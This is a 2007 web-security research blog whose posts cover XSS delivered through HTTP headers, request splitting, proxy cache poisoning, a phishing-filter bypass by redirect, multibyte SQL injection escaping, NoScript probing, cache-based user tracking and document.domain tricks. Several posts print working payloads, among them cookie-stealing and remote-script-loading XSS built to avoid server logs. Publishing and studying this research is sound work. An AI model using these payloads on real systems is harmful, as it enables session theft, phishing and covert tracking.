Friday, October 12, 2007

Detecting Firefox Extensions Without Javascript

ascii recently posted a piece on detecting whether Javascript execution is disabled through Firefox itself or through NoScript, by abusing NoScript's redirection code, here:

Which got me thinking about how else we could determine this - and while I haven't come up with another way to do that, I have come up with a method to detect Firefox extensions without Javascript. It may not work on all extensions, but it works with NoScript, and should work with any extension which has a CSS file in chrome with a single valid definition.

If we take a look at how Firefox resolves conflicts between duplicate definitions for the same class (and probably for the same id) then we notice that Firefox simply uses the latter definition.

Knowing this we can construct a page which looks like this:

  <style>
  .noscript-error {
    background-image: url(no.php);
  }
  @import url(chrome://noscript/skin/browser.css);
  </style>
  <div class="noscript-error">If NoScript is NOT installed (and enabled as an extension) then Firefox will make a request for no.php; otherwise it won't.</div>

Whereby we simply have to have no.php set something in the session to say that the user does not have NoScript installed.
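The server side of no.php can be sketched as follows (Python used purely for illustration; the function and session key names are hypothetical - the only thing taken from the technique itself is that the request arriving at all is the signal):

```python
def handle_no_php(session):
    """Hypothetical handler for no.php: the mere fact that the browser
    requested the background-image means NoScript's chrome stylesheet
    did not override our .noscript-error rule."""
    session["noscript_installed"] = False
    # The response body is irrelevant; the request itself is the signal.
    return "204 No Content"
```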

Note: Thanks to thornmaker for pointing out that no.php will also be requested by other browsers, so you probably want to do this only after you have determined which browser is being used.

Also, ascii/sirdarckcat came up with another method for detecting when NoScript is installed, which does positive detection (i.e. you get a response when it is installed, rather than this negative detection), but I'll let them write about that.

Thursday, July 19, 2007

Firefox gets httpOnly!

I don't usually report on things here, but since no-one else seems to be saying anything, I thought I should.

Anyway, Firefox has finally implemented httpOnly cookies, as you can see from their patch notes, and from the following test case:

Note: If httpOnly cookies are implemented, the alert box should be blank; if they are not implemented you should see an alert which says hidden=value


<?php header("Set-Cookie: hidden=value; httpOnly"); ?>
<script>alert(document.cookie);</script>


So hurrah for the Firefox developers who made this happen, no matter how long it took.

Wednesday, July 11, 2007

Exploiting reflected XSS vulnerabilities where user input must come through HTTP request headers


1.0 Introduction
2.0 The User_Agent Header
3.0 (Known) Firefox & Safari Request Header Injection (Sometimes)
4.0 Attacking Caching Proxies
5.0 References

1.0 Introduction

Ever since Adobe patched Flash Player to stop attackers spoofing certain headers[1] such as Referer, User-Agent, etc., it has been considered impossible to exploit XSS vulnerabilities where the user input is taken from a request header, e.g. when a website prints out what User-Agent a user's browser is sending without escaping it. The exception is the Referer header, which we can still control enough to exploit XSS attacks through it.

I want to showcase several ways in which we can still exploit these vulnerabilities.

2.0 The User_Agent header

If you look at how the User-Agent header is accessed in certain languages (namely PHP/Perl/Ruby/ColdFusion), you will see that the User-Agent header is not referenced as it is sent over the wire:

  PHP:        $_SERVER['HTTP_USER_AGENT']
  Perl (CGI): $ENV{'HTTP_USER_AGENT'}
  Ruby:       request.env['HTTP_USER_AGENT']
  ColdFusion: CGI.HTTP_USER_AGENT
As you can see, all of these languages use an underscore (_) instead of a hyphen (-) when accessing the data, so we can use Flash to send a User_Agent header, like this:

class Attack {
  static function main(mc) {
    var req:LoadVars = new LoadVars();

    req.addRequestHeader("User_Agent", "<script>alert(1)</script>");
    req.send("http://localhost/XSS/server.php", "_self");
  }
}

(This can easily be compiled with mtasc.)

So if any of the languages mentioned above insecurely prints the User-Agent header, or any other header with a hyphen in its name, then no matter whether the real header is blocked or not, a payload can still be injected.
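The name collision itself can be sketched as follows (Python used purely for illustration; the normalisation rule is the standard CGI convention for exposing request headers):

```python
def cgi_variable_name(header_name):
    # CGI-style environments expose request headers by uppercasing the
    # name, replacing hyphens with underscores, and prefixing HTTP_.
    return "HTTP_" + header_name.upper().replace("-", "_")

# The real header and the Flash-injected one collapse to one variable,
# so the injected value can shadow the legitimate User-Agent.
assert cgi_variable_name("User-Agent") == "HTTP_USER_AGENT"
assert cgi_variable_name("User_Agent") == "HTTP_USER_AGENT"
```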

The three other languages which I checked were ASP, ASP.NET and Java, and this is how the variables are accessed:

  ASP:     Request.ServerVariables("HTTP_USER_AGENT")
  ASP.NET: Request.ServerVariables["HTTP_USER_AGENT"]
  Java:    request.getHeader("User-Agent")

And while ASP/ASP.NET would seem to be vulnerable, it is a known fact to the MS developers[2] that headers with underscores cannot be accessed through the HTTP_ server variables, and so they have added more methods[2], which are not vulnerable.

Java does things neatly, and so it is not vulnerable.

Note: I made a mistake originally, and it seems that Perl apps are only vulnerable when testing through browsers other than IE.

Perl seems to use the last User_Agent or User-Agent header which you send it, and since the Flash plugin in IE appends our User_Agent header before IE's User-Agent header, Perl apps cannot be exploited when the user is using IE.

3.0 (Known) Firefox & Safari Request Header Injection (Sometimes)

Stefano Di Paola published a paper[3] in which he pointed out that IE7 and Firefox both facilitated request splitting when Digest authentication is used; Comcor also pointed out that Safari is vulnerable to the same issue.

IE7 was only vulnerable through the XMLHttpRequest object, which can only be invoked from the website which has Digest authentication, so it is useless to us in this case.

Furthermore, request splitting is only useful when a user is behind a proxy (see the note at the end of this section), so when a user is not behind a proxy there is still a point to spoofing headers rather than conducting a request splitting attack.

Anyway, what was not mentioned in the paper is that the attack can be invoked not only through an img tag, but also from an iframe tag, so here is a rather contrived PoC (based on Stefano's code):


  <?php
  header('Set-Cookie: PHPSESSID=6555');

  if (intval($_COOKIE['PHPSESSID']) !== 6555) {
    header('HTTP/1.0 401 Authorization Required');
    header('WWW-Authenticate: Digest realm="", qop="auth,auth-int", nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093", opaque="5ccc069c403ebaf9f0171e9517f40e41"');
  } else {
    header("Set-Cookie: PHPSESSID=0");
  }
  ?>

  <iframe src="http://user%0aUser-Agent%3a%20%3Cscript%3Ealert%281%29%3C%2Fscript%3E%0aTest%3a%20:pp@localhost/XSS/digest.php"></iframe>

Note: It's not completely true that we can't do any request splitting without a proxy; we can still split requests and have a server with multiple vhosts interpret the second split request as a normal request for a vhost other than the one which has the digest authentication. Thanks to Amit Klein for pointing this out.
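To see what the PoC URL is actually smuggling, the username portion can be URL-decoded (Python here just for the decoding; the payload is taken verbatim from the iframe above):

```python
from urllib.parse import unquote

username = ("user%0aUser-Agent%3a%20%3Cscript%3Ealert%281%29"
            "%3C%2Fscript%3E%0aTest%3a%20")
# The %0a sequences become newlines, so the "username" carries two
# extra header lines into the Digest Authorization handshake:
print(unquote(username))
# user
# User-Agent: <script>alert(1)</script>
# Test:
```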

4.0 Attacking Caching Proxies

Warning: This attack is rather convoluted, and a bit impractical. *shrug*

Anti-DNS Pinning was disclosed by Martin Johns[4] and improved upon by Kanatoko Anvil[5][6][7]; Kanatoko also found that Flash doesn't pin DNS[8], and together they found that Java's DNS record could be spoofed when used via LiveConnect[9].

This gives us an exceptionally powerful tool - an ability to create socket connections from a victim's computer.

So by utilising the low level socket abilities of Flash or Java we can create a socket connection to the user's caching proxy server if they have one. From there we can inject requests where we provide an XSS payload in the appropriate HTTP request header, which the proxy will sometimes cache, so when we redirect the user to that page they will be served the XSSed version.

This works because cache servers are often set up to cache html pages, and they are sometimes set up so that the only thing which is matched is the URL, rather than any headers or cookies.

Here is a step-by-step explanation:

1. First of all we need to know the IP address and port the user uses to access their proxy - sadly this part is rather browser specific.

On IE we can use Java[10][11] to detect the proxy settings (I know nothing about Java, other than the fact that it's possible, and there are known methods); in Firefox we can use Javascript[12] to read the Firefox settings network.proxy.http and network.proxy.http_port.

2. The next step is to open a socket to the proxy server; Anti-DNS Pinning attacks are already well documented in [4][5][6][7][8][9].

3. Send a request to the caching proxy with an XSS payload in the appropriate HTTP headers on the socket you have established.

4. Send the user to the cached page. This can be improved by using Flash to send a "Cache-Control: only-if-cached" header so that the proxy is more likely to serve the XSS-ed page.
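Steps 2 and 3 amount to pushing a raw HTTP request at the proxy over the socket. A sketch of what that request would look like (Python for illustration; the host, path and the choice of echoed header are hypothetical - the attack assumes the target page reflects that header):

```python
def build_poisoning_request(host, path, payload):
    # Raw request the Flash/Java socket would send to the caching
    # proxy; the XSS payload rides in a header the target page echoes.
    return ("GET {path} HTTP/1.1\r\n"
            "Host: {host}\r\n"
            "User-Agent: {payload}\r\n"
            "Connection: close\r\n"
            "\r\n").format(host=host, path=path, payload=payload)

req = build_poisoning_request("victim.example", "/echo-ua.php",
                              "<script>alert(1)</script>")
```

If the proxy caches the poisoned response keyed only on the URL, any later visitor (including the victim we redirect there) receives the XSS-ed copy.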

Note: I don't have any code to test this, but when I set up squid to cache html pages, creating a socket to the proxy, injecting into headers, and then viewing the same page in the browser worked, so I see no reason why this shouldn't. I have also personally seen live proxy servers set up to cache html pages, where these attacks are possible; so while I'm not sure how common such setups are, they definitely exist.

5.0 References

[1] "Forging HTTP request headers with Flash", Amit Klein, July 2006

[2] "HOWTO: Retrieve Request Headers using ISAPI, ASP, and ASP.Net", David Wang, April 2006

[3] "IE 7 and Firefox Browsers Digest Authentication Request Splitting", Stefano Di Paola, April 2007

[4] "(somewhat) breaking the same-origin policy by undermining dns-pinning", Martin Johns, August 2006

[5] "Stealing Information Using Anti-DNS Pinning : Online Demonstration", Kanatoko Anvil, December 2006

[6] "Re: DNS Spoofing/Pinning", Kanatoko Anvil, December 2006

[7] "Anti-DNS Pinning + Socket in FLASH", Kanatoko Anvil, February 2007

[8] "Re: DNS Spoofing/Pinning", Kanatoko Anvil, February 2007

[9] "Using Java in anti DNS-pinning attacks (Firefox and Opera)", Martin Johns & Kanatoko Anvil, February 2007

[10] "How to detect Proxy Settings for Internet Connection"

[11] "RE: Auto-detecting proxy settings in a standalone Java app"

[12] "Read Firefox Settings (PoC)", Sergey Vzloman, May 2007

Saturday, June 30, 2007

Universal Phishing Filter Bypass

Well, I tried to do responsible disclosure, so I could at least claim I care about how secure users are (and get my name in some patch notes, :p), but according to Microsoft "The Internet Explorer phishing filter is not a security feature, so this is not something MSRC would track." Mozilla haven't replied (email sent early Wednesday), and Opera haven't replied either (bug report added early Thursday) - though I didn't give Opera much time, and I really don't think it's a big issue for them, because the filter isn't even on by default in Opera.

To better understand how the following idea can actually be utilised, and why it matters, you need to understand the point of the phishing filter. When a phishing site is first created and sent to users, the phishing filter does not know about it - the phishing filter is updated based on a blacklist of URLs which are manually entered.

The reason the filter works is that while a phisher could encode the address to stop it being detected, or move the server, etc., all the emails they have already sent still contain the same static, blocked link. This is the whole premise of the filter - all the emails have the same link, and that link is blocked. It doesn't have to be the case, though, and I'll write something about that some other day.

To avoid this, one can do the following:

Send out phishing emails as one normally would, but instead of pointing to the actual phishing page, point to some central server which can send arbitrary response headers, or which is under your complete control.

The page the user is sent to actually redirects the user to an actual phishing page, either on the same server or another.

There is a loophole in the phishing filters: if a page is blocked, but instead of being loaded it redirects the user, then the phishing warning is not displayed (the filters seem to do their checks after the page, or at least its html, has been loaded).

What this means is that the moment a phishing URL is added to the list, the phisher can easily just make it redirect elsewhere (or just encode it, and redirect to the encoded URL to bypass the filter), and voila, the link in the phishing email is working again.

And considering all the filters do direct URL comparisons, and the redirects do not have to be static (i.e. you could use mod_rewrite to make random URLs show the same phishing page), the way current phishing filters are set up you could evade them indefinitely.

If you want to confirm this, here are the steps I sent to MS/Mozilla/Opera on how to verify it:

1. Find a blocked URL.
- I got one from PhishTank

2. Point the hosts file entry for the domain to an IP.
- I pointed it at my localhost

3. Create a directory/page on your server in the same place as the phishing page.
- I created /yahoo/index.php on my localhost

4. Confirm that your page is being blocked.
- I directed my browser to the phishing URL as usual, and it was blocked in all browsers

5. Clear the browser cache/restart the browser.
- IE and Firefox need a restart, Opera needs you to manually clear the cache

6. Edit the file to redirect to another file on the site which is not blocked.
- I created /yahoo/login.php and then used a Location redirect in index.php to redirect myself there:

header("Location: http://localhost/yahoo/login.php");

7. Visit the original phishing page again.
- I directed my browser to the original phishing URL as usual, and in both browsers no message was shown to the user, and I was successfully redirected, even though the original page was a known phishing URL in both systems.

Note: The need to clear the cache/restart the browser would not impact an attack, because the redirecting page would never be filtered and cached in the first place; it is merely an artifact of checking that the URL is properly blocked. So if you can trust me that the URL is blocked, you can simply ignore step 4.

Wednesday, June 27, 2007

[My]SQL Injection Encoding Attacks

Early last year Chris Shiflett and Ilia Alshanetsky published some posts about how it is possible to conduct SQL Injection attacks against sites which escape user input, but either use an encoding unaware escaping function (e.g. addslashes()), or do not inform their escaping function about the issue.

I'm not going to re-hash their posts, so you should go read them now, if you haven't done so before.

But who actually does either of those things? Well, Google Code Search reports approximately 54,300 results for applications using addslashes(), and approximately 100 applications which have the words "SET CHARACTER SET" in their code.

Not particularly many of the latter, but the very first result is the rather popular phpMyAdmin project, so it's not a completely unused query.

Anyway, since I hadn't seen any research on which character sets are vulnerable (and which characters to use), I wrote a small fuzzer to test all the character sets which MySQL supports (other than UCS-2) for several different encoding attacks, though only the ones described by Chris and Ilia yielded any results. Here are the vulnerable character sets, with the ranges for the first character of the multi-byte sequence where \ is the second character:
  • big5, [A1-F9]

  • sjis, [81-9F], [E0-FC]

  • gbk, [81-FE]

  • cp932, [81-9F], [E0-FC]
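The attack Chris and Ilia described can be sketched for the GBK case as follows (Python for illustration; the naive escaping function is a deliberately encoding-unaware re-implementation in the spirit of PHP's addslashes(), not PHP's actual code):

```python
def naive_addslashes(data: bytes) -> bytes:
    # Encoding-unaware escaping: backslash-escape quotes, backslashes
    # and NUL byte by byte, oblivious to multi-byte characters.
    out = bytearray()
    for b in data:
        if b in b"'\"\\\x00":
            out += b"\\"
        out.append(b)
    return bytes(out)

payload = b"\xbf'"                   # lead byte 0xBF, then a quote
escaped = naive_addslashes(payload)  # becomes 0xBF 0x5C 0x27
# In GBK, 0xBF 0x5C is one valid two-byte character, so the escaping
# backslash is swallowed and a bare quote survives into the query:
assert escaped.decode("gbk").endswith("'")
```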

I didn't successfully test ucs2, because ucs2 is a fixed-width 2-byte character encoding which will not execute queries passed in standard ascii. It would therefore be impossible to get a webapp working if you set your connection to ucs2 but didn't convert all your queries, so a configuration issue like that would be instantly noticed; and if you were using an encoding-unaware escaping function with ucs2, it would definitely be vulnerable, since all byte sequences are two bytes.

Anyway, if anyone is interested, I uploaded the fuzzer here: As you will notice, I ripped the code which Ilia used to illustrate the vulnerability for GBK, so the two pieces look very similar. It's also not very well written, but it worked and got the results for me.

Notes: Part 2 of the fuzzer tries to see if it's possible to have a double or single quote as the second character in a multi-byte sequence, and Part 3 tries to see if it's possible to use a quote as the first character.

Also, this is obviously MySQL specific. The reason is that (as far as I could find out) MySQL is the only RDBMS which allows you to set the connection encoding through a query; all the others require configuration changes. And while addslashes() issues are applicable to all RDBMSs, most applications these days use mysql_real_escape_string().

Saturday, June 02, 2007

Building Secure Single Sign On Systems and Google

After seeing several posts which spelled doom and gloom if an XSS hole were ever found in any of Google's sites (because they use a Single Sign On (SSO) system), I started trying to think of a method by which single sign on could be securely implemented where all the SSO server side code is trusted, e.g. when you own all the websites. Here's what I came up with.

Idea 1: Remote Javascript

The first thing that came into my head was using remote Javascript files to give any SSO site a login token (site specific, of course), which the server side back-end could then use to query a database to check that the specific token was valid for their site. If it was, the user would be issued another site-specific login token, which would be placed in the user's cookie, and session management would resume as usual.

The problem with this is, of course, making sure that no other sites can retrieve this login token by including the same remote javascript in their page.

Of course, there are several things you could do to prevent this:

You could do referer checks. While we have seen methods to spoof or strip referers, there have been no methods, to my knowledge, which can do this when requesting script elements. You could technically spoof the header normally and try to poison the cache, but as long as the appropriate cache headers are sent, this should not be possible.

But this leaves any users who have referer stripping firewalls in danger, and this is unacceptable.

You could use CSRF-style protections. But this faces the problem of what you can actually tie the token to. You could tie the token to the IP, but as long as Anti-DNS Pinning works this can be attacked and broken, so it is not a valid solution. Furthermore, doing such checks would be rather expensive in terms of the operations that need to be performed, since this is being done between separate servers/sites.

Which essentially means that while we can make this system secure for most people, there are some we would not secure, and it is therefore not viable.

Idea 2: Remote iframes

I kept thinking about other ways you could send data to a specific site only and (from my attempts to break SessionSafe) I remembered that we could use iframes.

If an iframe sets the property, the page which loaded the iframe cannot read that value - and even if it could, that would be considered a browser bug and fixed. So to transfer data to our domain, and our domain only, we would do the following:

Write an iframe to the page which looked like this:
<iframe width="300" height="150" src=""></iframe>

And on the SSO domain the following would be done:

If the user is not logged in display a login form.

If the user is logged in, then write the following javascript to the page: = '';

Where the destination was determined by a switch statement on the site variable, so that only a valid site could be redirected to, and so the SSO service knew which particular value to parse in the auth variable.
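That switch statement can be sketched like this (Python for illustration; the site keys and URLs are made up - the point is only that the destination comes from a fixed whitelist, never from attacker-controllable input):

```python
SSO_DESTINATIONS = {
    # hypothetical site keys mapped to their token-consuming endpoints
    "mail": "https://mail.example/sso",
    "news": "https://news.example/sso",
}

def resolve_sso_destination(site):
    # Only a whitelisted site may receive an auth token; anything else
    # is rejected rather than echoed back as a redirect target.
    if site not in SSO_DESTINATIONS:
        raise ValueError("unknown SSO site: %r" % site)
    return SSO_DESTINATIONS[site]
```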

The other mechanisms are the same as in Idea 1. Furthermore this protects you from Programmatic password theft, since the password is entered on a domain which has nothing other than a login form.

Google's Approach

After thinking of Idea 2, I realised that this is what Google does, on most of their services anyway. The one service (at which I initially looked to find out how Google implemented SSO, *doh*) which doesn't use the exact same method as above is Gmail. What it turns out Gmail does (which I somehow missed) is, instead of using an iframe, redirect to a page on the SSO domain where the whole login page is displayed, and the form is submitted to that same domain.

So what does this mean?

I came to the same idea independently of Google (which to me says there must be some merit to it, since I didn't just see the idea and say: hey, this looks good), and it should in theory and practice be perfectly sound, as long as a website cannot determine the URL to which the iframe (or a page loaded in an iframe) is being redirected, and there are no XSS holes in the SSO domain.

So Google's SSO should be secure in the face of an XSS hole?

Well, no; Google messed up: they made their SSO domain the same domain as their main site, which means it is used for more central purposes (central in terms of design, rather than importance). This is bad, because there should be nothing on the SSO domain other than SSO forms; otherwise someone may find XSS holes in the SSO domain, and that breaks the whole system (bar things like IP locks tying the sessions together, though with Anti-DNS Pinning even that can be broken).

So what are you trying to say?

What I'm trying to say is that any XSS hole which is not on the SSO domain (and yes, the www is important) will not break SSO, but any XSS hole which is on that domain has the potential to.

Oh, and Google isn't completely hopeless when it comes to security - they just have many more developers working for them, and many more web facing projects than most organisations.

Saturday, May 19, 2007

Tracking users with Cache Data

There are several methods that browsers and web servers use to speed up browsing, so that less data needs to be transferred over the network; two of these methods are the ETag/If-None-Match and Last-Modified/If-Modified-Since headers. The premise is fairly simple for both.

With the ETag/If-None-Match headers, the server simply sends an ETag header for a resource the first time it is requested, along with the resource itself - the next time the browser needs the same resource, it sends the value the server returned in the ETag response header as the parameter of an If-None-Match request header.

If the server responds with a 304 Not Modified status, and does not return a message body (it MUST NOT return a message body), then the ETag is preserved in the cache, and the browser will keep sending the same If-None-Match header until the cache is deleted, as long as it keeps getting 304 replies.

The Last-Modified/If-Modified-Since system is identical, just with different header names.

Sadly though, the ETag/If-None-Match headers are only supported by Firefox, whereas the Last-Modified/If-Modified-Since headers are supported in both Firefox and IE - to my knowledge (through my testing) none of these headers are supported in Opera.

As such it would be better to use the Last-Modified/If-Modified-Since headers.

All you need to do now is embed a tracking image in each page, and send a unique date each time no If-Modified-Since header is sent, and a blank 304 response at all other times.
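The tracking endpoint's logic can be sketched as follows (Python for illustration; the function name and the counter-as-timestamp trick are hypothetical details - a real implementation just needs any unique date per first-time visitor):

```python
from email.utils import formatdate

_next_id = 0

def tracking_image(if_modified_since):
    """Serve the tracking resource: a unique Last-Modified stamp on
    the first request, then empty 304s that keep the stamp alive."""
    global _next_id
    if if_modified_since is None:
        _next_id += 1
        # Encode a visitor id as a timestamp; the browser will echo it
        # back in If-Modified-Since on every future request.
        return "200 OK", {"Last-Modified": formatdate(_next_id, usegmt=True)}
    # A 304 MUST NOT carry a body, so the cached stamp is preserved.
    return "304 Not Modified", {}
```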

The biggest problem here, though, is that you do need a separate http request, and as such the only way to associate requests is per IP and time frame, e.g. any request made <=10 seconds before the request for a particular date/etag, from the same IP, is the same user. You could also try using the Referer header, but the odds of someone denying cookies yet sending Referers are very low, IMO.

You could also use Javascript instead of images, and then you would be able to link requests more easily, but it would require you make an additional request from that page with the URL in the query string and tracking id, or similar.

You would still need to use one of these techniques though, because you need to serve different pieces of javascript to different people, and have that piece of javascript cached as long as possible.

But even given this, this gives you a method to track users who deny cookies between browsing sessions - for tighter correlation during browsing sessions you could use Jeremiah Grossman's Basic Auth Tracking.

P.S. This is stored with the other cache data, so it will only work as long as the image/resource is cached; clearing the cache manually (or turning the cache off) will stop this technique.

Wednesday, May 16, 2007

Determining sites trusted by NoScript

With the (relatively) new XSS filter added to NoScript, it has become possible to determine whether a site is trusted or untrusted by seeing whether NoScript decides to take action. Of course this is not 100% accurate, since all these features can be turned off, but if they are turned off then you can execute some attacks anyway.

Open Redirect

The easiest method to determine whether a site is trusted is to use an open redirect, because you have control over where a site is sending a user, and as such can use the following two pieces of code to check whether a given site is trusted:

<iframe src=""></iframe>

<?php
if (strpos($_SERVER['QUERY_STRING'], "=") !== FALSE) {
    print "Untrusted!";
} else {
    print "Trusted!<br />\n";
    print "For ID: " . $_SERVER['QUERY_STRING'];
}
?>

The server-generated id is not actually necessary, since you can just store the info in a PHP session, but with it you can 'attack' even people who have cookies disabled.

Non-Open Redirects

Now, a much more difficult task is attacking non-open redirects. Two things which limit this are:
  • We cannot use Javascript to determine where you've been.

  • We cannot actually pass a parameter to where we will be redirected.

The solution to the first problem lies here:

The solution to the second problem is a bit trickier, and relies on the 'usual' implementation of these systems, rather than a versatile technique.

Most systems which perform closed redirection have URLs which look like:

Where the id value is first run through intval(), then put directly into an SQL statement.

Now, we can exploit this fact by sending people to a URL like this:

Whereby if the site is trusted then we will not be redirected anywhere, because the URL will be filtered to look like this:

And since the id no longer begins with a digit, the value of the variable, once put through intval(), is 0, and either no redirect, or a completely different redirect, will be performed.

If the site is untrusted, though, then the URL will be unfiltered, and when the id is run through intval() it will evaluate to 123, so the user will be redirected to the usual place.
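The behaviour that makes this work can be sketched as follows (Python mimicking PHP's intval(); the exact string NoScript rewrites the parameter to doesn't matter and is only illustrative here - all that matters is that it no longer starts with a digit):

```python
import re

def php_intval(s):
    # PHP's intval() parses an optional sign and leading digits,
    # returning 0 when the string doesn't start with a number.
    m = re.match(r"\s*[+-]?\d+", s)
    return int(m.group()) if m else 0

# Untrusted site: the parameter arrives unfiltered, lookup finds row 123.
assert php_intval("123<script>") == 123
# Trusted site: NoScript rewrites the parameter so it no longer starts
# with a digit, and the lookup degrades to id 0.
assert php_intval("#123<script>") == 0
```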

Controlled Off-Site Resources

If you can control any off-site resources, such as images, which a site embeds, then simply putting an ID in one parameter and <script> in another will cause the referer to differ between trusted and untrusted sites.

Generic Method

The methods above all rely on a webapp having some specific feature, and while they're interesting (which is why I included them), a generic method is far more useful.

And this generic method is extremely simple; just use the non-javascript history hack to find out what exact URLs a person has been to.

If you send a user to:

And the history hack says the user has been to

Then the site is obviously trusted.


These techniques can be used either to gather data about the user, a la the Master Recon Tool (Mr. T) or the Black Dragon Project, or, more importantly, to aid an attacker in bypassing NoScript's filters by finding which sites are trusted, and then either using those sites as a means of propagation (i.e. emailing/PM-ing a user a link) or sending the user to a persistent or DOM based XSS on one of those sites.

Final notes

Since we do not have Javascript, we need to be a bit tricky about how we actually use the info. The cleanest method, if you have a persistent or DOM based XSS on another site, is: instead of simply sending data back to your server to be analysed, have the CSS-only history hack render an iframe which loads an iframe from your server, which redirects the user to the persistent or DOM based XSS on the trusted site.

The other method is having an iframe which refreshes every 5 seconds and sends a request to the server; the server then tries to aggregate all the data it has collected, and acts on it.

Why would you want to do this rather than sending the user to every single persistent and DOM based XSS condition you have?

Beats me; I just thought this was interesting.....

Saturday, April 28, 2007

Creating sockets to sites which run Google Analytics javascript without Anti-DNS Pinning

This is a short post, but I thought this warranted its own post, so that the message is not lost.

One of the repercussions of my last post is that any site which references the document.location property (e.g. any site running the Google Analytics javascript) can be referenced by any subdomain.

And top level domains do not have to have any relation to their subdomain, so a DNS setup where these resolutions occur: -> web server controlled by -> victim web server running Google Analytics (or other document.location referencing code)

Is possible. Now, since the attacker's subdomain can communicate with the upper level domain[1], as per my last post, it can easily just insert a java applet (or, with Firefox, javascript which uses the Java libraries) into the victim page, which will be able to create sockets to the web server's IP.

Another way the DNS->IP resolution scheme of subdomains not needing to be related can be abused is by making a subdomain resolve to the IP of a service like MySpace, which has a "domain generalisation" scheme that sets the document.domain property to the second level domain; the attacker's page can then set its own document.domain to match, and create sockets to the service.

And while at present this is a fairly pointless attack, since we can still use Anti-DNS Pinning attacks, those problems may be solved before this one.

[1] Note that all these attacks will only work if the hosts accept wildcard hostnames, so that the Google Analytics code is returned even if the hostname is incorrect.

Friday, April 27, 2007

Breaking the same origin policy in an upwards direction (IE & Firefox Only)

To explain why this is meaningful, I'll first give a quick primer on the document.domain property:

The document.domain property is by default set to the hostname which is used to access a site.

The document.domain property is not read-only. It can be truncated by however many levels you like, so a site on sub2.sub1.domain.tld could set the document.domain property to sub1.domain.tld or domain.tld or just tld[1]
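The truncation rule can be sketched as a predicate (Python purely for illustration; real browsers also special-case things like bare TLDs, as the footnote describes):

```python
def may_set_document_domain(current_host, new_value):
    # document.domain may stay the same or be truncated to any
    # dot-separated suffix of the current hostname.
    return (new_value == current_host
            or current_host.endswith("." + new_value))

assert may_set_document_domain("sub2.sub1.domain.tld", "sub1.domain.tld")
assert may_set_document_domain("sub2.sub1.domain.tld", "domain.tld")
assert may_set_document_domain("sub2.sub1.domain.tld", "tld")
assert not may_set_document_domain("domain.tld", "otherdomain.tld")
```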

To determine whether javascript is able to interact with another window, the document.domain property is compared; if the values are identical then the two windows can communicate.

Finally, there is an additional check whereby a page where the document.domain property has been modified cannot communicate with a page where it has not been modified.

Firefox and IE do have this check, but it seems a bit more relaxed: if the upper level domain reads the document.location property, the check is seemingly ignored.

Now, one might be tempted to shrug this off, but many tracking scripts, including the Google Analytics tracking code, reference the document.location property, and so any site which runs the Google Analytics code is vulnerable to having lower level domains communicate with it unwittingly.

[1] The Firefox 3 nightly build does not allow anyone to set the property to a bare tld, as per two patches from trev/Wladimir Palant.

This isn't the post you're looking for either

A few days ago prdelka posted a blog entry entitled "This isnt the post your looking for"; you should read it, preferably before reading any more of this post. He also deleted all his other blog postings, and removed all the papers and exploits, etc., which he had written, from his server.

For a while security people have been saying that such legislation would be a bad idea, because they, as well as anyone actually malicious, could be prosecuted - but the law understands mitigating factors, and I doubt such a thing would happen.

What I am more interested in is how many of the hobbyists who do a considerable part of the research into computer security will be affected. Will they, like prdelka, decide to take the cautious route, and remove all their writings from public view? Will they be driven more or less underground, where information is only shared among close friends until it spreads to the hands of criminals, without ever surfacing to help IT security people? Or will they decide to ignore the laws and continue as before? Only time will tell, obviously; but what does everyone think?

And if you're in Britain, how will this affect you?

Sunday, April 01, 2007

Untraceable XSS Attacks Version 2

I was thinking about the Adobe PDF UXSS issue that we encountered a few months ago, and remembered how much of a problem we had solving it because servers were not sent the URL fragments (the part after the #).

Now this got me thinking; the client can still read the portion of the URL after the # symbol.

So why not put the location of our logic after the URL fragment like so:

<meta http-equiv="refresh" content="0;<script>var source_loc = document.location.href.substr (document.location.href.lastIndexOf("#") + 1); var s = document.createElement ('script'); s.src=source_loc; document.body.appendChild(s);</script>#">

And then you just shove that in an iframe, or popup, or whatever other technique you are using to make sure users don't notice they're being attacked, and you're done.
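The fragment-extraction step in that payload can be sketched on its own as a plain function over a URL string (a standalone sketch; the attack URL shown is made up, and in the exploit you would pass document.location.href):

```javascript
// Everything after the last '#' never reaches the server, so it stays
// out of server logs - but the client can still read it.
function getFragment(url) {
  var pos = url.lastIndexOf("#");
  return pos === -1 ? "" : url.substr(pos + 1);
}

console.log(getFragment(""));
// → ""
```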

Looking at the actual exploit, you can see that what we end up doing is using a Reflected XSS hole to create a DOM Based XSS hole which is specifically untraceable.

And it seems like a much cleaner method than the last two posts to me.

Friday, March 30, 2007

(Non-Persistent) Untraceable XSS Attacks (IE & Opera version)

[EDIT]: Due to something I misunderstood ages ago this post is completely useless, so please see: which has been re-written.

Sadly I have an appalling habit of assuming that the way Firefox does things is the way other browsers do things when it comes to Javascript, and I am constantly missing things because of it.

Anyway; what I only just remembered is that IE and Opera treat and as separate domains, and even if we can interact with this is almost completely useless to us.

But the goal here is not to allow our domain to talk to another domain. Our goal here is to not have to send our attack logic to the vulnerable web app, where it will be logged by the server.

We can use the same basic concept as in the last post, but instead of having go.php redirect to something which calls our logic from the parent, we will need it to look more like this: (Copy and paste it into notepad because it goes off the side of the page)

<meta http-equiv="refresh" content="0;<script>document.location = ''+escape(document.cookie);</script>">

And then our attack page would have to look something more like this:
<script>
document.domain = 'com.';
function logic () {
    var loc = window.frames[0].document.location.href;
    var cookie = loc.substr (loc.lastIndexOf("=") + 1);
}
</script>
<iframe src="go.php" />

I have not tested this, but it should be possible to simply extract the cookie from the domain as demonstrated above, then set the same cookie for - but you will run into issues if there are authentication cookies for a subdomain, which you cannot extract. For most scenarios this should still be workable.

(Non-Persistent) Untraceable XSS Attacks

[EDIT]: Sorry for taking so long to do this, but I've been really busy lately. Anyway, when doing my initial testing with document.domain stuff Firefox threw some errors when I tried to set the domain to just 'com' - I'm not sure why, since this is allowed - and as such this post was needlessly confusing (since I thought you could only set it to 'com.'), so I've rewritten it (keeping most of it intact). The old copy is still at the end, but it's not really worth reading since it's pretty much the same thing.

When most XSS attacks are conducted they simply inject all the attack logic right into the domain they are attacking. This of course gives out information such as the servers where cookies are getting logged, or any other attack logic, because it has been sent to the server - and since it is generally sent via GET, it is seen in all server logs. The only exception to this is when the attack logic is hosted on another site, and a script tag is injected. The problem with this is that it still reveals where the server with the attack logic was located, and if the admin reacts relatively quickly, then the attack logic can be captured from that server.

Sometimes this is unavoidable, as in the case of persistent XSS attacks, because they rely on having the attack logic located on the site so that users will be attacked with it, without having to go to another site.

